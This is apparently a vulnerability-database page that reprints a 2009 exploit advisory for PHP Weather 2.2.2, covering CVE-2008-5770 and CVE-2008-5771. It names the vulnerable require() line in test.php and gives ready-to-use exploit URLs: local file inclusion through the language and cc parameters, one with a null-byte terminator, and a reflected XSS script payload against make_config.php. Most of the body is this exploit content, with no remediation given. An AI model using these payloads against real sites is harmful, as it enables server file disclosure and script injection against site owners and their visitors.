PHP Weather 2.2.2 (LFI/XSS) Multiple Remote Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052317 漏洞类型
发布时间 2009-01-02 更新时间 2009-01-02
CVE编号 CVE-2008-5770
CVE-2008-5771
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009010091
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
****(Lfi/xss)****

script: phpweather-2.2.2

***************************************************************************
download from:http://downloads.sourceforge.net/phpweather/phpweather-2.2.2.zip?modtime=1087430400&big_mirror=0
   
***************************************************************************
vul:
/test.php

line 48:
 require(PHPWEATHER_BASE_DIR . "/output/pw_text_$language.php");
   
***************************************************
xpl:
www.site.com/path/test.php?metar=()&language=[Lfi]%00
.....................................................
www.site.com/path/index.php?cc=[Lfi]
....................................................
xss:
www.site.com/path/config/make_config.php/>"><ScRiPt>alert(0)</ScRiPt>
..................................................

Author: ahmadbady from:iran

***************************************************